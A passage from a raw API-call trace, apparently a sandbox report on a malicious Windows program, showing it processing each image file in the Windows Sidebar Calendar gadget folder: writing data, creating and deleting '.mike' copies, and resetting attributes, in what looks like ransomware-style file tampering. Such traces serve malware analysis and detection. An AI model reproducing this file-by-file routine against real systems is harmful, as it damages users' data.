Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_ring_docked.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\calendar.gadget\\images\\calendar_ring_docked.png.mike")) returned 1 [0102.677] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0d4) returned 1 [0102.679] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2adf10) returned 1 [0102.679] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af00c) returned 1 [0102.679] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af008) returned 1 [0102.679] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af168) returned 1 [0102.679] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0102.680] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af164) returned 1 [0102.680] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0102.680] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0102.680] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0102.680] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0102.680] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0102.680] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0102.680] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_single.png", nBufferLength=0x105, lpBuffer=0x2aebf4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_single.png", lpFilePart=0x0) returned 0x53 [0102.681] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af058) returned 1 [0102.681] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af054) returned 1 [0102.681] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0102.681] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0102.681] WriteFile (in: hFile=0x288, lpBuffer=0x21c4990*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af074, lpOverlapped=0x0 | out: lpBuffer=0x21c4990*, lpNumberOfBytesWritten=0x2af074*=0x220, lpOverlapped=0x0) returned 1 [0102.682] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a0) returned 1 [0102.683] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af09c) returned 1 [0102.683] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0102.683] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0102.685] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_single.png.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_single.png.mike", lpFilePart=0x0) returned 0x58 [0102.685] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0102.685] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0102.685] WriteFile (in: hFile=0x288, lpBuffer=0x21cacd8*, nNumberOfBytesToWrite=0x5e0, lpNumberOfBytesWritten=0x2af074, lpOverlapped=0x0 | out: lpBuffer=0x21cacd8*, lpNumberOfBytesWritten=0x2af074*=0x5e0, lpOverlapped=0x0) returned 1 [0102.686] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeffc) returned 1 [0102.686] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff8) returned 1 [0102.687] WriteFile (in: hFile=0x288, lpBuffer=0x21cdf2c*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0a4, lpOverlapped=0x0 | out: lpBuffer=0x21cdf2c*, lpNumberOfBytesWritten=0x2af0a4*=0x20c, lpOverlapped=0x0) returned 1 [0102.687] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0102.687] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0102.687] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0102.688] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0102.688] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_single.png", dwFileAttributes=0x80) returned 0 [0102.689] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af028) returned 1 [0102.689] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af024) returned 1 [0102.689] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_single.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\calendar.gadget\\images\\calendar_single.png.mike")) returned 1 [0102.690] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0d4) returned 1 [0102.692] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2adf10) returned 1 [0102.692] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af00c) returned 1 [0102.692] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af008) returned 1 [0102.692] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af168) returned 1 [0102.692] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0102.692] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af164) returned 1 [0102.692] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0102.692] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0102.693] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0102.693] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0102.693] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0102.693] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0102.693] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_single_bkg.png", nBufferLength=0x105, lpBuffer=0x2aebf4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_single_bkg.png", lpFilePart=0x0) returned 0x57 [0102.693] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af058) returned 1 [0102.693] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af054) returned 1 [0102.693] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0102.694] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0102.694] WriteFile (in: hFile=0x288, lpBuffer=0x21d34a8*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af074, lpOverlapped=0x0 | out: lpBuffer=0x21d34a8*, lpNumberOfBytesWritten=0x2af074*=0x220, lpOverlapped=0x0) returned 1 [0102.695] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a0) returned 1 [0102.695] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af09c) returned 1 [0102.695] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0102.695] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0102.697] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_single_bkg.png.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_single_bkg.png.mike", lpFilePart=0x0) returned 0x5c [0102.698] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0102.698] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0102.698] WriteFile (in: hFile=0x288, lpBuffer=0x21dc810*, nNumberOfBytesToWrite=0xde0, lpNumberOfBytesWritten=0x2af074, lpOverlapped=0x0 | out: lpBuffer=0x21dc810*, lpNumberOfBytesWritten=0x2af074*=0xde0, lpOverlapped=0x0) returned 1 [0102.698] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeffc) returned 1 [0102.698] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff8) returned 1 [0102.699] WriteFile (in: hFile=0x288, lpBuffer=0x21dfa74*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0a4, lpOverlapped=0x0 | out: lpBuffer=0x21dfa74*, lpNumberOfBytesWritten=0x2af0a4*=0x20c, lpOverlapped=0x0) returned 1 [0102.700] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0102.700] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0102.700] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0102.700] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0102.700] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_single_bkg.png", dwFileAttributes=0x80) returned 0 [0102.702] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af028) returned 1 [0102.702] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af024) returned 1 [0102.702] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_single_bkg.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\calendar.gadget\\images\\calendar_single_bkg.png.mike")) returned 1 [0102.703] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0d4) returned 1 [0102.705] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2adf10) returned 1 [0102.705] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af00c) returned 1 [0102.705] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af008) returned 1 [0102.705] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af168) returned 1 [0102.705] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0102.706] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af164) returned 1 [0102.706] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0102.706] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0102.706] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0102.706] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0102.706] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0102.706] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0102.707] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_single_bkg_orange.png", nBufferLength=0x105, lpBuffer=0x2aebf4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_single_bkg_orange.png", lpFilePart=0x0) returned 0x5e [0102.707] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af058) returned 1 [0102.707] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af054) returned 1 [0102.707] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0102.707] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0102.707] WriteFile (in: hFile=0x288, lpBuffer=0x21e5244*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af074, lpOverlapped=0x0 | out: lpBuffer=0x21e5244*, lpNumberOfBytesWritten=0x2af074*=0x220, lpOverlapped=0x0) returned 1 [0102.708] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a0) returned 1 [0102.708] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af09c) returned 1 [0102.709] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0102.709] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0102.711] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_single_bkg_orange.png.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_single_bkg_orange.png.mike", lpFilePart=0x0) returned 0x63 [0102.711] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0102.711] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0102.711] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeffc) returned 1 [0102.712] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff8) returned 1 [0102.713] WriteFile (in: hFile=0x288, lpBuffer=0x21f2538*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0a4, lpOverlapped=0x0 | out: lpBuffer=0x21f2538*, lpNumberOfBytesWritten=0x2af0a4*=0x20c, lpOverlapped=0x0) returned 1 [0102.734] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0102.735] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0102.735] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0102.735] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0102.735] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_single_bkg_orange.png", dwFileAttributes=0x80) returned 0 [0102.736] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af028) returned 1 [0102.736] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_single_bkg_orange.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\calendar.gadget\\images\\calendar_single_bkg_orange.png.mike")) returned 1 [0102.740] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0102.741] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_single_orange.png", nBufferLength=0x105, lpBuffer=0x2aebf4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_single_orange.png", lpFilePart=0x0) returned 0x5a [0102.741] WriteFile (in: hFile=0x288, lpBuffer=0x21f7d14*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af074, lpOverlapped=0x0 | out: lpBuffer=0x21f7d14*, lpNumberOfBytesWritten=0x2af074*=0x220, lpOverlapped=0x0) returned 1 [0102.744] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_single_orange.png.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_single_orange.png.mike", lpFilePart=0x0) returned 0x5f [0102.744] WriteFile (in: hFile=0x288, lpBuffer=0x21ffd78*, nNumberOfBytesToWrite=0xab0, lpNumberOfBytesWritten=0x2af074, lpOverlapped=0x0 | out: lpBuffer=0x21ffd78*, lpNumberOfBytesWritten=0x2af074*=0xab0, lpOverlapped=0x0) returned 1 [0102.746] WriteFile (in: hFile=0x288, lpBuffer=0x2202fe4*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0a4, lpOverlapped=0x0 | out: lpBuffer=0x2202fe4*, lpNumberOfBytesWritten=0x2af0a4*=0x20c, lpOverlapped=0x0) returned 1 [0102.747] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_single_orange.png", dwFileAttributes=0x80) returned 0 [0102.748] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_single_orange.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\calendar.gadget\\images\\calendar_single_orange.png.mike")) returned 1 [0102.751] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0102.752] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\corner.png", nBufferLength=0x105, lpBuffer=0x2aebf4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\corner.png", lpFilePart=0x0) returned 0x4a [0102.752] WriteFile (in: hFile=0x288, lpBuffer=0x2208370*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af074, lpOverlapped=0x0 | out: lpBuffer=0x2208370*, lpNumberOfBytesWritten=0x2af074*=0x220, lpOverlapped=0x0) returned 1 [0102.754] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\corner.png.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\corner.png.mike", lpFilePart=0x0) returned 0x4f [0102.754] WriteFile (in: hFile=0x288, lpBuffer=0x220c6f8*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2af074, lpOverlapped=0x0 | out: lpBuffer=0x220c6f8*, lpNumberOfBytesWritten=0x2af074*=0xe0, lpOverlapped=0x0) returned 1 [0102.756] WriteFile (in: hFile=0x288, lpBuffer=0x220f924*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0a4, lpOverlapped=0x0 | out: lpBuffer=0x220f924*, lpNumberOfBytesWritten=0x2af0a4*=0x20c, lpOverlapped=0x0) returned 1 [0102.756] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\corner.png", dwFileAttributes=0x80) returned 0 [0102.758] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\corner.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\calendar.gadget\\images\\corner.png.mike")) returned 1 [0102.760] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0102.761] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\curl-hot.png", nBufferLength=0x105, lpBuffer=0x2aebf4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\curl-hot.png", lpFilePart=0x0) returned 0x4c [0102.761] WriteFile (in: hFile=0x288, lpBuffer=0x2214ae8*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af074, lpOverlapped=0x0 | out: lpBuffer=0x2214ae8*, lpNumberOfBytesWritten=0x2af074*=0x220, lpOverlapped=0x0) returned 1 [0102.764] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\curl-hot.png.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\curl-hot.png.mike", lpFilePart=0x0) returned 0x51 [0102.764] WriteFile (in: hFile=0x288, lpBuffer=0x221a2b8*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x2af074, lpOverlapped=0x0 | out: lpBuffer=0x221a2b8*, lpNumberOfBytesWritten=0x2af074*=0x400, lpOverlapped=0x0) returned 1 [0102.766] WriteFile (in: hFile=0x288, lpBuffer=0x221d4ec*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0a4, lpOverlapped=0x0 | out: lpBuffer=0x221d4ec*, lpNumberOfBytesWritten=0x2af0a4*=0x20c, lpOverlapped=0x0) returned 1 [0102.766] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\curl-hot.png", dwFileAttributes=0x80) returned 0 [0102.768] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\curl-hot.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\calendar.gadget\\images\\curl-hot.png.mike")) returned 1 [0102.771] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0102.771] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\curl.png", nBufferLength=0x105, lpBuffer=0x2aebf4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\curl.png", lpFilePart=0x0) returned 0x48 [0102.771] WriteFile (in: hFile=0x288, lpBuffer=0x2222608*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af074, lpOverlapped=0x0 | out: lpBuffer=0x2222608*, lpNumberOfBytesWritten=0x2af074*=0x220, lpOverlapped=0x0) returned 1 [0102.774] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\curl.png.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\curl.png.mike", lpFilePart=0x0) returned 0x4d [0102.774] WriteFile (in: hFile=0x288, lpBuffer=0x22273d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2af074, lpOverlapped=0x0 | out: lpBuffer=0x22273d0*, lpNumberOfBytesWritten=0x2af074*=0x380, lpOverlapped=0x0) returned 1 [0102.776] WriteFile (in: hFile=0x288, lpBuffer=0x222a5f4*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0a4, lpOverlapped=0x0 | out: lpBuffer=0x222a5f4*, lpNumberOfBytesWritten=0x2af0a4*=0x20c, lpOverlapped=0x0) returned 1 [0102.777] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\curl.png", dwFileAttributes=0x80) returned 0 [0102.778] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\curl.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\calendar.gadget\\images\\curl.png.mike")) returned 1 [0102.780] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0102.781] WriteFile (in: hFile=0x288, lpBuffer=0x222f69c*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af074, lpOverlapped=0x0 | out: lpBuffer=0x222f69c*, lpNumberOfBytesWritten=0x2af074*=0x220, lpOverlapped=0x0) returned 1 [0102.783] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\month.png.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\month.png.mike", lpFilePart=0x0) returned 0x4e [0102.783] WriteFile (in: hFile=0x288, lpBuffer=0x223395c*, nNumberOfBytesToWrite=0xa0, lpNumberOfBytesWritten=0x2af074, lpOverlapped=0x0 | out: lpBuffer=0x223395c*, lpNumberOfBytesWritten=0x2af074*=0xa0, lpOverlapped=0x0) returned 1 [0102.785] WriteFile (in: hFile=0x288, lpBuffer=0x2236b88*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0a4, lpOverlapped=0x0 | out: lpBuffer=0x2236b88*, lpNumberOfBytesWritten=0x2af0a4*=0x20c, lpOverlapped=0x0) returned 1 [0102.785] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\month.png", dwFileAttributes=0x80) returned 0 [0102.787] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\month.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\calendar.gadget\\images\\month.png.mike")) returned 1 [0102.789] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0102.790] WriteFile (in: hFile=0x288, lpBuffer=0x223bda0*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af074, lpOverlapped=0x0 | out: lpBuffer=0x223bda0*, lpNumberOfBytesWritten=0x2af074*=0x220, lpOverlapped=0x0) returned 1 [0102.793] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\rings-desk.png.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\rings-desk.png.mike", lpFilePart=0x0) returned 0x53 [0102.793] WriteFile (in: hFile=0x288, lpBuffer=0x2240984*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2af074, lpOverlapped=0x0 | out: lpBuffer=0x2240984*, lpNumberOfBytesWritten=0x2af074*=0x200, lpOverlapped=0x0) returned 1 [0102.795] WriteFile (in: hFile=0x288, lpBuffer=0x2243bc0*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0a4, lpOverlapped=0x0 | out: lpBuffer=0x2243bc0*, lpNumberOfBytesWritten=0x2af0a4*=0x20c, lpOverlapped=0x0) returned 1 [0102.796] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\rings-desk.png", dwFileAttributes=0x80) returned 0 [0102.797] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\rings-desk.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\calendar.gadget\\images\\rings-desk.png.mike")) returned 1 [0102.799] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, 